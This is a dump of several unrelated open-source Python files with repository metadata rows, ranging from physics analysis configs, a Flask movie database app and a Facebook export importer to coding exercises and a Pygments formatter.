:param storage_account_primary_key: Primary key of the witness storage
account.
:type storage_account_primary_key: str
"""
_attribute_map = {
'domain_fqdn': {'key': 'domainFqdn', 'type': 'str'},
'ou_path': {'key': 'ouPath', 'type': 'str'},
'cluster_bootstrap_account': {'key': 'clusterBootstrapAccount', 'type': 'str'},
'cluster_operator_account': {'key': 'clusterOperatorAccount', 'type': 'str'},
'sql_service_account': {'key': 'sqlServiceAccount', 'type': 'str'},
'file_share_witness_path': {'key': 'fileShareWitnessPath', 'type': 'str'},
'storage_account_url': {'key': 'storageAccountUrl', 'type': 'str'},
'storage_account_primary_key': {'key': 'storageAccountPrimaryKey', 'type': 'str'},
}
def __init__(self, *, domain_fqdn: str=None, ou_path: str=None, cluster_bootstrap_account: str=None, cluster_operator_account: str=None, sql_service_account: str=None, file_share_witness_path: str=None, storage_account_url: str=None, storage_account_primary_key: str=None, **kwargs) -> None:
super(WsfcDomainProfile, self).__init__(**kwargs)
self.domain_fqdn = domain_fqdn
self.ou_path = ou_path
self.cluster_bootstrap_account = cluster_bootstrap_account
self.cluster_operator_account = cluster_operator_account
self.sql_service_account = sql_service_account
self.file_share_witness_path = file_share_witness_path
self.storage_account_url = storage_account_url
self.storage_account_primary_key = storage_account_primary_key
|
[
"[email protected]"
] | |
d905ee37aa6ecea6a752fbc54249897a44a54d0e
|
66e6360325b781ed0791868765f1fd8a6303726f
|
/TB2009/WorkDirectory/5223 All Charges/ExportCharge.py
|
0256e8dcc77eb233c47742a482097e9b389b68a6
|
[] |
no_license
|
alintulu/FHead2011PhysicsProject
|
c969639b212d569198d8fce2f424ce866dcfa881
|
2568633d349810574354ad61b0abab24a40e510e
|
refs/heads/master
| 2022-04-28T14:19:30.534282 | 2020-04-23T17:17:32 | 2020-04-23T17:17:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,613 |
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("PrintCharges")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(50000))
process.source = cms.Source("HcalTBSource",
fileNames = cms.untracked.vstring('file:/tmp/chenyi/HTB_.root'),
streams = cms.untracked.vstring('HCAL_Trigger','HCAL_SlowData','HCAL_QADCTDC','HCAL_DCC021','Chunk699')
)
process.hcal_db_producer = cms.ESProducer("HcalDbProducer",
dump = cms.untracked.vstring(''),
file = cms.untracked.string('')
)
process.es_hardcode = cms.ESSource("HcalHardcodeCalibrations",
toGet = cms.untracked.vstring('GainWidths','PedestalWidths','QIEData','ChannelQuality','ZSThresholds','RespCorrs')
)
process.es_ascii = cms.ESSource("HcalTextCalibrations",
input = cms.VPSet(
cms.PSet(
object = cms.string('ElectronicsMap'),
file = cms.FileInPath('emap_TB2009_A.txt')
),
cms.PSet(
object = cms.string('Pedestals'),
file = cms.FileInPath('pedestals_TB2009_.txt')
),
cms.PSet(
object = cms.string('Gains'),
file = cms.FileInPath('gains_TB2009_LMIP_newpedestal.txt')
)
)
)
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 1000
process.tbUnpacker = cms.EDFilter("HcalTBObjectUnpacker",
IncludeUnmatchedHits = cms.untracked.bool(False),
HcalTDCFED = cms.untracked.int32(8),
HcalQADCFED = cms.untracked.int32(8),
HcalSlowDataFED = cms.untracked.int32(3),
HcalTriggerFED = cms.untracked.int32(1),
HcalVLSBFED = cms.untracked.int32(699),
ConfigurationFile = cms.untracked.string('configQADCTDC_TB2009.txt')
)
process.hcalDigis = cms.EDFilter("HcalRawToDigi",
UnpackZDC = cms.untracked.bool(True),
FilterDataQuality = cms.bool(True),
ExceptionEmptyData = cms.untracked.bool(True),
InputLabel = cms.InputTag("source"),
ComplainEmptyData = cms.untracked.bool(False),
UnpackCalib = cms.untracked.bool(False),
firstSample = cms.int32(0),
lastSample = cms.int32(9),
FEDs = cms.untracked.vint32(21),
HcalFirstFED = cms.untracked.int32(21)
)
process.load("RecoLocalCalo.HcalRecProducers.HcalSimpleReconstructor_hbhe_cfi")
process.hbhereco.firstSample = 5
process.hbhereco.samplesToAdd = 4
process.options = cms.untracked.PSet(
Rethrow = cms.untracked.vstring('ProductNotFound',
'TooManyProducts',
'TooFewProducts')
)
process.triggerfilter = cms.EDFilter("TriggerFilter",
allowBeamTrigger = cms.untracked.bool(True),
allowOutOfSpillPedestalTrigger = cms.untracked.bool(False),
allowOthers = cms.untracked.bool(False)
)
process.oneparticle = cms.EDFilter("SingleTowerParticleFilter",
particleNumber = cms.untracked.int32(1)
)
process.muonveto = cms.EDFilter("MuonVetoFilter")
process.export = cms.EDAnalyzer("ExportChargeAnalyzer",
normalModule = cms.untracked.string('hbhereco')
)
process.vlsbinfo = cms.EDProducer("VLSBInformationProducer",
minSample = cms.untracked.uint32(0),
maxSample = cms.untracked.uint32(31),
baselineSamples = cms.untracked.uint32(2),
useMotherBoard0 = cms.untracked.bool(True),
useMotherBoard1 = cms.untracked.bool(True),
useMotherBoard2 = cms.untracked.bool(False),
useMotherBoard3 = cms.untracked.bool(True),
usePedestalMean = cms.untracked.bool(False),
mip = cms.untracked.string('MIP_EarlyRejection_Median.txt'),
adcMap = cms.untracked.string('FinalAdcMapping_All.txt'),
beamEnergy = cms.untracked.double()
)
process.vlsbreco = cms.EDProducer("HcalTBVLSBReconstructor",
minSample = cms.untracked.uint32(0),
maxSample = cms.untracked.uint32(31),
mipFileName = cms.untracked.string("MIP_EarlyRejection_Median.txt"),
adcMapFileName = cms.untracked.string("FinalAdcMapping_All.txt")
)
process.energydistribution = cms.EDAnalyzer("FillRHEnergyDistributionAnalyzer",
vlsbModule = cms.untracked.string("vlsbreco"),
normalModule = cms.untracked.string("hbhereco"),
output = cms.untracked.string("EnergyDistribution_ABC_.root")
)
process.timecut = cms.EDFilter("HighestSampleTimeFilter",
minimum = cms.untracked.double(7.5),
threshold = cms.untracked.double(100)
)
process.hitcut = cms.EDFilter("HitXFilter",
maximum = cms.untracked.double(-5)
)
process.mincut = cms.EDFilter("RHTotalEnergyCut",
minimum = cms.untracked.double(),
vlsbModule = cms.untracked.string("vlsbreco"),
normalModule = cms.untracked.string("hbhereco")
)
process.maxcut = cms.EDFilter("RHTotalEnergyCut",
minimum = cms.untracked.double(),
vlsbModule = cms.untracked.string("vlsbreco"),
normalModule = cms.untracked.string("hbhereco")
)
process.merge = cms.EDProducer("CombineCollectionProducer",
vlsbModule = cms.untracked.string("vlsbreco"),
normalModule = cms.untracked.string("hbhereco")
# interCalibration = cms.untracked.string("InterCalibration_Secondary.txt")
)
process.export = cms.EDAnalyzer("CExportChargeAnalyzer",
moduleName = cms.untracked.string('merge'),
simplified = cms.untracked.bool(True),
exportVlsb = cms.untracked.bool(True)
)
process.runinfo = cms.EDProducer("RunInformationProducer",
beamEnergy = cms.untracked.double()
)
process.p = cms.Path(
process.tbUnpacker *
process.vlsbinfo *
process.runinfo *
process.vlsbreco *
process.hcalDigis *
process.hbhereco *
process.triggerfilter *
process.oneparticle *
process.muonveto *
process.timecut *
process.hitcut *
process.mincut *
~process.maxcut *
process.merge *
process.export
)
|
[
"[email protected]"
] | |
c477af6c57995ecddcbfdc254fe373d15f3999c8
|
321b4ed83b6874eeb512027eaa0b17b0daf3c289
|
/252/252.meeting-rooms.234346443.Runtime-Error.leetcode.py
|
92868ca8e540837d3283eb90122ea37aa2b82d4d
|
[] |
no_license
|
huangyingw/submissions
|
7a610613bdb03f1223cdec5f6ccc4391149ca618
|
bfac1238ecef8b03e54842b852f6fec111abedfa
|
refs/heads/master
| 2023-07-25T09:56:46.814504 | 2023-07-16T07:38:36 | 2023-07-16T07:38:36 | 143,352,065 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 316 |
py
|
class Solution:
def canAttendMeetings(self, intervals):
overlap = []
for interval in sorted(intervals, key=lambda x: x.start):
if overlap and overlap[-1].end > interval.start:
return False
else:
overlap.append(interval)
return True
|
[
"[email protected]"
] | |
fc02fda54534594dd3a8358ecf562fc2cbd36a7e
|
0a1716384ac3425b0f457e210e43c0a499bd66d2
|
/process_files/_old/fix_processed_names.py
|
27e83d345283a04bd753cafb4edbf2a7f9b3850a
|
[] |
no_license
|
ilbarlow/process-rig-data
|
d54d0489ad42ef92e422915d01ac43feeb62bed3
|
89fc296628eb7f9260b099ee3cb2f25680905686
|
refs/heads/master
| 2020-03-18T21:50:05.775230 | 2018-03-28T20:13:41 | 2018-03-28T20:13:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,596 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 27 16:15:39 2016
@author: worm_rig
"""
import os
import shutil
import glob
import numpy as np
import pandas as pd
import warnings
from functools import partial
if __name__ == '__main__':
output_root = '/Volumes/behavgenom_archive$/Avelino/Worm_Rig_Tests/short_movies_new/'
#'/Volumes/behavgenom_archive$/Avelino/PeterAskjaer/'
exp_name = 'Double_pick_090217'#'Mutant_worm_screening_Y32H12A.7(ok3452)_220217'
tsv_file = os.path.join(output_root, 'ExtraFiles', exp_name + '_renamed.tsv')
tab = pd.read_table(tsv_file, names=['old', 'new'])
for _, row in tab.iterrows():
parts = row['old'].split(os.sep)
delP = [int(x[2:]) for x in parts if x.startswith('PC')][0]
old_base_name = os.path.splitext(os.path.basename(row['old']))[0]
old_ch = [int(x[2:]) for x in old_base_name.split('_') if x.startswith('Ch')][0]
base_name = os.path.splitext(os.path.basename(row['new']))[0]
real_ch = 'Ch{}'.format(2*(delP-1)+old_ch)
fparts = base_name.split('_')
ff = [x.strip() if not x.startswith('Ch') else real_ch for x in fparts ]
new_base_name = '_'.join(ff)
search_str = os.path.join(output_root,'**', exp_name, base_name + '*')
fnames = glob.glob(search_str)
for bad_name in fnames:
good_name = bad_name.replace(base_name, new_base_name)
print(bad_name, good_name)
#shutil.move(bad_name, good_name)
|
[
"[email protected]"
] | |
148ea8e659b1f395932dd56bb4319bd9d6022474
|
9ec58308459dc95405d1a32fcf8fae7f687a207b
|
/test/test_k_bank.py
|
71dc290f6f4630d2eaa7649866a90201a40f7e18
|
[
"MIT"
] |
permissive
|
ivanlyon/exercises
|
067aed812486dbd7a3d7de6e47a692c8b9383163
|
0792976ae2acb85187b26a52812f9ebdd119b5e8
|
refs/heads/master
| 2021-05-24T04:17:29.012329 | 2021-05-11T17:26:50 | 2021-05-11T17:26:50 | 65,584,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,597 |
py
|
import io
import unittest
from unittest.mock import patch
from kattis import k_bank
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input_1(self):
'''Run and assert problem statement sample 1 input and output.'''
inputs = []
inputs.append('4 4')
inputs.append('1000 1')
inputs.append('2000 2')
inputs.append('500 2')
inputs.append('1200 0')
inputs = '\n'.join(inputs) + '\n'
outputs = '4200\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_bank.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
def test_sample_input_2(self):
'''Run and assert problem statement sample 2 input and output.'''
inputs = []
inputs.append('3 4')
inputs.append('1000 0')
inputs.append('2000 1')
inputs.append('500 1')
inputs = '\n'.join(inputs) + '\n'
outputs = '3000\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_bank.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
dcdfd17496925a85400ab2e195a3c8e50d5401e6
|
d7f486eebaa164bf3274c843e1932c7eef596e5e
|
/importer/facebook.py
|
352a80e06ffca4048160d7b028cf173373aa9667
|
[
"MIT"
] |
permissive
|
Galaxyvintage/journal-1
|
aafe107645a6dde038b0010496c041ac635e966d
|
f666a3b38f0eeb2cc1f5576e0668f174bf1cbd8d
|
refs/heads/master
| 2020-03-20T09:15:09.269993 | 2018-07-05T16:31:17 | 2018-07-05T16:31:17 | 137,332,462 | 0 | 0 | null | 2018-06-14T08:54:38 | 2018-06-14T08:54:37 | null |
UTF-8
|
Python
| false | false | 7,091 |
py
|
import events
from database import db
import json
import datetime
import os
def load_to_json(filename):
json_data = open(filename).read()
return json.loads(json_data)
def read_app_posts(directory):
data = load_to_json(directory + "apps/posts_from_apps.json")
for post in data["app_posts"]:
attachment_data = post["attachments"][0]["data"][0]["external_context"]
time = datetime.datetime.fromtimestamp(post["timestamp"])
message = attachment_data["name"]
title = post["title"]
app_name = "unknown app"
if "via" in title:
app_name = title[title.index("via") + 4 : -1]
kvps = {"message": message, "title": title, "app": app_name}
if attachment_data.has_key("url"):
kvps["url"] = attachment_data["url"]
events.add("Facebook post via " + app_name + ": " + message, time, ["facebook", "post", "app"], kvps)
def read_app_installs(directory):
data = load_to_json(directory + "apps/installed_apps.json")
for item in data["installed_apps"]:
events.add("Added Facebook app " + item["name"] + ".", datetime.datetime.fromtimestamp(item["time_added"]), ["facebook", "app"], {"app": item["name"]})
def read_comments(directory):
data = load_to_json(directory + "comments/comments.json")
for comment in data["comments"]:
time = datetime.datetime.fromtimestamp(comment["timestamp"])
message = comment["data"][0]["comment"]["comment"]
events.add("Facebook: " + comment["title"], time, ["facebook", "comment"], {"message": message})
def read_events(directory):
data = load_to_json(directory + "events/event_responses.json")
for event in data["event_responses"]["events_joined"]:
time = datetime.datetime.fromtimestamp(event["start_timestamp"])
name = event["name"]
events.add("Participated in Facebook event: " + name, time, ["facebook", "event"], {"name": name})
data = load_to_json(directory + "events/your_events.json")
for event in data["your_events"]:
time = datetime.datetime.fromtimestamp(event["start_timestamp"])
name = event["name"]
location = event["place"]["name"]
events.add("Hosted Facebook event: " + name, time, ["facebook", "event"], {"name": name, "location": location, "message": event["description"]})
def read_friends(directory):
data = load_to_json(directory + "friends/friends_added.json")
for friend in data["friends"]:
time = datetime.datetime.fromtimestamp(friend["timestamp"])
name = friend["name"]
events.add("Added Facebook friend " + name + ".", time, ["facebook", "friend"], {"name": name})
def create_conversation_event(title, message_count, time, participants, history, first):
kvps = {"participants": participants, "message": history}
if first:
events.add(
"Started a Facebook conversation with " + title + " (" + str(message_count) + " message" + (
"s" if message_count > 1 else "") + ").",
time, ["facebook", "message"], kvps)
else:
events.add(
"Exchanged " + str(message_count) + " Facebook message" + (
"s" if message_count > 1 else "") + " with " + title + ".",
time, ["facebook", "message"], kvps)
def read_messages(directory):
message_directory = directory + "messages/"
for conversation in [os.path.join(message_directory, name) for name in os.listdir(message_directory) if os.path.isdir(os.path.join(message_directory, name)) and name != "stickers_used"]:
data = load_to_json(conversation + "/message.json")
if not data.has_key("title"):
continue
title = data["title"]
participants = [title]
if data.has_key("participants"):
participants = data["participants"]
messages = data["messages"]
session_start_time = None
last_message_time = None
history = ""
message_count = 0
session_count = 0
for message in reversed(messages):
if message.has_key("content"):
message_time = datetime.datetime.fromtimestamp(message["timestamp"])
if session_start_time is None:
session_start_time = message_time
elif (message_time - last_message_time).total_seconds() > 4 * 60 * 60:
create_conversation_event(title, message_count, session_start_time, ", ".join(participants), history, session_count == 0)
session_start_time = message_time
message_count = 0
session_count += 1
history = ""
last_message_time = message_time
message_count += 1
history += message["sender_name"] + ": " + message["content"] + "\n"
if message.has_key("photos") and not message["sender_name"] in participants:
events.add("Sent " + (str(len(message["photos"])) + " images" if len(message["photos"]) > 1 else "an image") + " to " + title + ".",
datetime.datetime.fromtimestamp(message["timestamp"]),
["facebook", "message", "image"], kvps={"participants": ", ".join(participants)}, images=[directory + photo["uri"] for photo in message["photos"]])
if message.has_key("photos") and message["sender_name"] in participants:
events.add("Received " + (str(len(message["photos"])) + " images" if len(
message["photos"]) > 1 else "an image") + " from " + message["sender_name"] + ".",
datetime.datetime.fromtimestamp(message["timestamp"]),
["facebook", "message", "image"], kvps={"participants": ", ".join(participants)},
images=[directory + photo["uri"] for photo in message["photos"]])
create_conversation_event(title, message_count, session_start_time, ", ".join(participants), history, session_count == 0)
def read_photos(directory):
photo_directory = directory + "photos/album/"
for album_file in [os.path.join(photo_directory, name) for name in os.listdir(photo_directory)]:
data = load_to_json(album_file)
album_name = data["name"]
for photo in data["photos"]:
file = directory + photo["uri"]
metadata = photo["media_metadata"]["photo_metadata"]
time = datetime.datetime.fromtimestamp(metadata["taken_timestamp"]) if metadata.has_key("taken_timestamp") else datetime.datetime.fromtimestamp(metadata["modified_timestamp"])
tags = ["facebook", "photo"]
kvps = {}
if metadata.has_key("camera_make") and metadata.has_key("camera_model"):
camera = metadata["camera_make"] + " " + metadata["camera_model"]
tags.append(camera)
kvps["camera"] = camera
events.add("Added photo to Facebook album " + album_name + ".",
time,
tags,
kvps,
hash=file,
latitude=(metadata["latitude"] if metadata.has_key("latitude") else None),
longitude=(metadata["longitude"] if metadata.has_key("longitude") else None),
images=[file])
def import_facebook_data(directory = "data/facebook/"):
with db.atomic():
print "Reading Facebook app posts..."
read_app_posts(directory)
read_app_installs(directory)
print "Reading Facebook comments..."
read_comments(directory)
print "Reading Facebook events..."
read_events(directory)
print "Reading Facebook friends..."
read_friends(directory)
print "Reading Facebook messages..."
read_messages(directory)
print "Reading Facebook photos..."
read_photos(directory)
if __name__ == "__main__":
import_facebook_data()
|
[
"[email protected]"
] | |
9088845ee4cd9fc4f784727bc6f020bc4213b6a6
|
786de89be635eb21295070a6a3452f3a7fe6712c
|
/Detector/tags/V00-00-05/SConscript
|
d6fb3976c08526bf2e9adb925905a3b3a1b85635
|
[] |
no_license
|
connectthefuture/psdmrepo
|
85267cfe8d54564f99e17035efe931077c8f7a37
|
f32870a987a7493e7bf0f0a5c1712a5a030ef199
|
refs/heads/master
| 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,454 |
#--------------------------------------------------------------------------
# File and Version Information:
# $Id$
#
# Description:
# SConscript file for package Detector
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
#
# For the standard SIT packages which build libraries, applications,
# and Python modules it is usually sufficient to call
# standardSConscript() function which defines rules for all
# above targets. Many standard packages do not need any special options,
# but those which need can modify standardSConscript() behavior using
# a number of arguments, here is a complete list:
#
# LIBS - list of additional libraries needed by this package
# LIBPATH - list of directories for additional libraries
# BINS - dictionary of executables and their corresponding source files
# TESTS - dictionary of test applications and their corresponding source files
# SCRIPTS - list of scripts in app/ directory
# UTESTS - names of the unit tests to run, if not given then all tests are unit tests
# PYEXTMOD - name of the Python extension module, package name used by default
# CCFLAGS - additional flags passed to C/C++ compilers
# NEED_QT - set to True to enable Qt support
#
#
#standardSConscript()
standardSConscript(PYEXTMOD="detector_ext")
#, DOCGEN="doxy-all psana-modules-doxy")
|
[
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] |
[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7
|
|
3bb4b250c9e481e8342d3d85a655fadd62014d8a
|
82c7adb0bfaa667c50ac7b336bb815863b378fa9
|
/finace/items.py
|
60984524386545327a13568ee270fe67c087fc4d
|
[
"Apache-2.0"
] |
permissive
|
pythonyhd/finace
|
c8a7dca65dfe33cabcb90630d8791d3a5b942bc9
|
614d98ad92e1bbaa6cf7dc1d6dfaba4f24431688
|
refs/heads/master
| 2022-11-30T17:53:40.947747 | 2020-08-14T03:47:26 | 2020-08-14T03:47:26 | 287,253,978 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 262 |
py
|
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class FinaceItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
|
[
"[email protected]"
] | |
5da193ab8f0e2efa5b0645b1029e0314fd56b029
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_011/ch92_2019_10_02_17_54_14_425785.py
|
043154a806fa8650cc4d1a71882bef7df3c5440f
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 292 |
py
|
def simplifica_dict(dicionario):
lista = []
for chave in dicionario:
if chave not in lista:
lista.append(chave)
for valor in dicionario[chave]:
if dicionario[chave] not in lista:
lista.append(dicionario[chave])
return lista
|
[
"[email protected]"
] | |
ba8c4775490031f4b1abd9541e76e7d99773e96c
|
44845df9198ae8c80fabecb6ed3ae6a44e43f38c
|
/modo/admin.py
|
4aa582f42f92bbc0b441d3019c6b6fb02550a96f
|
[] |
no_license
|
CarlosSanz81/cima
|
570da404bddd0a813a025163a9e94676b9d0b4a9
|
3ad9b37af4a2d8a5789915208afffec7b6af3c0e
|
refs/heads/master
| 2021-01-23T08:00:04.964713 | 2017-03-28T14:33:09 | 2017-03-28T14:33:09 | 72,184,187 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 143 |
py
|
from django.contrib import admin
from .models import Modo
@admin.register(Modo)
class AdminModo(admin.ModelAdmin):
list_display = ('nombre',)
|
[
"[email protected]"
] | |
fcb878a2819bc83a0ed79bdb5b844916fa3fbdbe
|
794e14945c0521b4eab03e8b9a3f93b8fa14e021
|
/src/compas_rhino/utilities/constructors.py
|
e71275fa0d0e525a4bf92e58e2154310209ae1c9
|
[
"MIT"
] |
permissive
|
KEERTHANAUDAY/compas
|
5e8ada865bc87ee48ba77b3f6fd03661a9b9c17d
|
4d1101cf302f95a4472a01a1265cc64eaec6aa4a
|
refs/heads/master
| 2021-07-11T16:26:19.452926 | 2020-09-10T14:27:11 | 2020-09-10T14:27:11 | 294,453,684 | 0 | 0 |
MIT
| 2020-09-10T15:47:31 | 2020-09-10T15:47:30 | null |
UTF-8
|
Python
| false | false | 2,494 |
py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.utilities import geometric_key
import Rhino
import scriptcontext as sc
__all__ = ['volmesh_from_polysurfaces']
def volmesh_from_polysurfaces(cls, guids):
"""Construct a volumetric mesh from given polysurfaces.
Essentially, this function does the following:
* find each of the polysurfaces and check if they have a boundary representation (b-rep)
* convert to b-rep and extract the edge loops
* make a face of each loop by referring to vertices using their geometric keys
* add a cell per brep
* and add the faces of a brep to the cell
* create a volmesh from the found vertices and cells
Parameters
----------
cls : :class:`compas.datastructures.VolMesh`
The class of volmesh.
guids : sequence of str or System.Guid
The *globally unique identifiers* of the polysurfaces.
Returns
-------
:class:`compas.datastructures.Volmesh`
The volumetric mesh object.
"""
gkey_xyz = {}
cells = []
for guid in guids:
cell = []
obj = sc.doc.Objects.Find(guid)
if not obj.Geometry.HasBrepForm:
continue
brep = Rhino.Geometry.Brep.TryConvertBrep(obj.Geometry)
for loop in brep.Loops:
curve = loop.To3dCurve()
segments = curve.Explode()
face = []
sp = segments[0].PointAtStart
ep = segments[0].PointAtEnd
sp_gkey = geometric_key(sp)
ep_gkey = geometric_key(ep)
gkey_xyz[sp_gkey] = sp
gkey_xyz[ep_gkey] = ep
face.append(sp_gkey)
face.append(ep_gkey)
for segment in segments[1:-1]:
ep = segment.PointAtEnd
ep_gkey = geometric_key(ep)
face.append(ep_gkey)
gkey_xyz[ep_gkey] = ep
cell.append(face)
cells.append(cell)
gkey_index = dict((gkey, index) for index, gkey in enumerate(gkey_xyz))
vertices = [list(xyz) for gkey, xyz in gkey_xyz.items()]
cells = [[[gkey_index[gkey] for gkey in face] for face in cell] for cell in cells]
return cls.from_vertices_and_cells(vertices, cells)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
[
"[email protected]"
] | |
339f9df0dd568b0dac0574b4653c263cc9d9af76
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/come_old_problem_to_point/ask_thing/see_day/seem_problem/time/find_few_week_over_point.py
|
b79ee7a454f58433209a2c9c27edba7f4f38079b
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 229 |
py
|
#! /usr/bin/env python
def government(str_arg):
use_public_day(str_arg)
print('small_man_and_long_world')
def use_public_day(str_arg):
print(str_arg)
if __name__ == '__main__':
government('ask_day_from_year')
|
[
"[email protected]"
] | |
a30686b6eabb2cac56f288acadb5c196580ebf70
|
e6947a8ecc14ddb3c078321958856f888953f4fa
|
/my_project.py
|
d96f10703e7f2af3f045b4ee516f87f077c77cb7
|
[] |
no_license
|
raja073/SimpleMovieDB
|
a5dd4b924f1ecb8d04a61c9884e25e6a51af5c3c
|
4d28dba684ea0ebf6ad4b78af4c2bdd13b072406
|
refs/heads/master
| 2021-09-05T13:59:35.372062 | 2018-01-28T14:06:57 | 2018-01-28T14:06:57 | 118,252,070 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,032 |
py
|
from flask import Flask, render_template, request, redirect, url_for
app = Flask(__name__) ### Instance of the Flask with name of the running application as an argument
#################################################################################################
# Adding database to Flask application
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Movie, Actor
engine = create_engine('sqlite:///movieactors.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind = engine)
session = DBSession()
#################################################################################################
@app.route('/')
@app.route('/movies')
def movieList():
movies = session.query(Movie).all()
return render_template('full_movie_list.html', movies = movies)
@app.route('/movie/<int:movie_id>/')
def movieActors(movie_id):
movie = session.query(Movie).filter_by(id = movie_id).one()
actors = session.query(Actor).filter_by(movie_id = movie.id)
return render_template('menu.html', movie = movie, actors = actors)
@app.route('/movie/new/', methods=['GET','POST'])
def newMovie():
if request.method == 'POST':
newMov = Movie(name=request.form['name'])
session.add(newMov)
session.commit()
return redirect(url_for('movieList'))
else:
return render_template('new_movie.html')
# Task 1: Create route for newActor function here
@app.route('/movie/<int:movie_id>/new/', methods=['GET','POST'])
def newActor(movie_id):
if request.method == 'POST':
newAct = Actor(name=request.form['name'], gender=request.form['gender'], \
age=request.form['age'], biography=request.form['bio'], movie_id=movie_id)
session.add(newAct)
session.commit()
return redirect(url_for('movieActors', movie_id=movie_id))
else:
return render_template('new_actor.html', movie_id=movie_id)
# Task 2: Create route for editActor function here
@app.route('/movie/<int:movie_id>/<int:actor_id>/edit/', methods=['GET','POST'])
def editActor(movie_id, actor_id):
editedActor = session.query(Actor).filter_by(id=actor_id).one()
if request.method == 'POST':
if request.form['name']:
editedActor.name = request.form['name']
session.add(editedActor)
session.commit()
return redirect(url_for('movieActors', movie_id=movie_id))
else:
return render_template('edit_actors.html', movie_id=movie_id, actor_id=actor_id, i=editedActor)
# Task 3: Create route for deleteActor function here
@app.route('/movie/<int:movie_id>/<int:actor_id>/delete/', methods=['GET','POST'])
def deleteActor(movie_id, actor_id):
actorToDelete = session.query(Actor).filter_by(id=actor_id).one()
if request.method == 'POST':
session.delete(actorToDelete)
session.commit()
return redirect(url_for('movieActors', movie_id=movie_id))
else:
return render_template('delete_actor.html', i=actorToDelete)
if __name__ == '__main__':
app.debug = True
app.run(host = '0.0.0.0', port = 5000)
|
[
"[email protected]"
] | |
9fd2adff33eb37163fba31027204557321194233
|
6320fef2ea7376c2b35f97f1a5af004e90f09098
|
/1-2주차 실습(복습)/venv/Lib/site-packages/pygments/formatters/irc.py
|
49f8b3d13114e627e86ef8bdd693496bd155fd7f
|
[] |
no_license
|
Dplo1514/ploaistudy
|
7aa08d7f71653748a9e32dcc09ee8f6cec0aaed9
|
e35e42b1e5f0c90cc1e2a59993a1ef73d8872d0c
|
refs/heads/master
| 2023-09-03T00:45:55.601651 | 2021-10-24T12:19:38 | 2021-10-24T12:19:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,026 |
py
|
"""
pygments.formatters.irc
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for IRC output
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
from pygments.util import get_choice_opt
__all__ = ['IRCFormatter']
#: Map token types to a tuple of color values for light and dark
#: backgrounds.
IRC_COLORS = {
Token: ('', ''),
Whitespace: ('gray', 'brightblack'),
Comment: ('gray', 'brightblack'),
Comment.Preproc: ('cyan', 'brightcyan'),
Keyword: ('blue', 'brightblue'),
Keyword.Type: ('cyan', 'brightcyan'),
Operator.Word: ('magenta', 'brightcyan'),
Name.Builtin: ('cyan', 'brightcyan'),
Name.Function: ('green', 'brightgreen'),
Name.Namespace: ('_cyan_', '_brightcyan_'),
Name.Class: ('_green_', '_brightgreen_'),
Name.Exception: ('cyan', 'brightcyan'),
Name.Decorator: ('brightblack', 'gray'),
Name.Variable: ('red', 'brightred'),
Name.Constant: ('red', 'brightred'),
Name.Attribute: ('cyan', 'brightcyan'),
Name.Tag: ('brightblue', 'brightblue'),
String: ('yellow', 'yellow'),
Number: ('blue', 'brightblue'),
Generic.Deleted: ('brightred', 'brightred'),
Generic.Inserted: ('green', 'brightgreen'),
Generic.Heading: ('**', '**'),
Generic.Subheading: ('*magenta*', '*brightmagenta*'),
Generic.Error: ('brightred', 'brightred'),
